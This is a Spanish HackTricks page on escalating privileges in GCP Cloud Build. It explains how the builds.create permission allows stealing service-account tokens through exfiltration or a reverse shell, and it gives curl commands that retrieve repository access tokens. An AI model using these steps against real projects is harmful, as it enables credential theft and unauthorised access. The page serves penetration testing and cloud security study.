GCP - Cloudbuild Privesc

Support HackTricks

cloudbuild

Para más información sobre Cloud Build, consulta:

cloudbuild.builds.create

Con este permiso puedes enviar un cloud build. La máquina de cloudbuild tendrá en su sistema de archivos por defecto un token de la cuenta de servicio de cloudbuild: <PROJECT_NUMBER>@cloudbuild.gserviceaccount.com. Sin embargo, puedes indicar cualquier cuenta de servicio dentro del proyecto en la configuración de cloudbuild. Por lo tanto, puedes hacer que la máquina exfiltre el token a tu servidor o obtener un shell reverso dentro de ella y conseguir el token (el archivo que contiene el token puede cambiar).

Puedes encontrar el script de explotación original aquí en GitHub (pero la ubicación de donde toma el token no funcionó para mí). Por lo tanto, consulta un script para automatizar la creación, explotación y limpieza de un entorno vulnerable aquí y un script de python para obtener un shell reverso dentro de la máquina de cloudbuild y robarlo aquí (en el código puedes encontrar cómo especificar otras cuentas de servicio).

Para una explicación más detallada, visita https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/

cloudbuild.builds.update

Potencialmente con este permiso podrás actualizar un cloud build y simplemente robar el token de la cuenta de servicio como se realizó con el permiso anterior (pero desafortunadamente en el momento de escribir esto no pude encontrar ninguna manera de llamar a esa API).

TODO

cloudbuild.repositories.accessReadToken

Con este permiso, el usuario puede obtener el token de acceso de lectura utilizado para acceder al repositorio:

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
-d '{}' \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>/repositories/<repo-id>:accessReadToken"

cloudbuild.repositories.accessReadWriteToken

Con este permiso, el usuario puede obtener el token de acceso de lectura y escritura utilizado para acceder al repositorio:

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
-d '{}' \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>/repositories/<repo-id>:accessReadWriteToken"

cloudbuild.connections.fetchLinkableRepositories

Con este permiso puedes obtener los repos a los que tiene acceso la conexión:

curl -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>:fetchLinkableRepositories"
Apoya a HackTricks

Last updated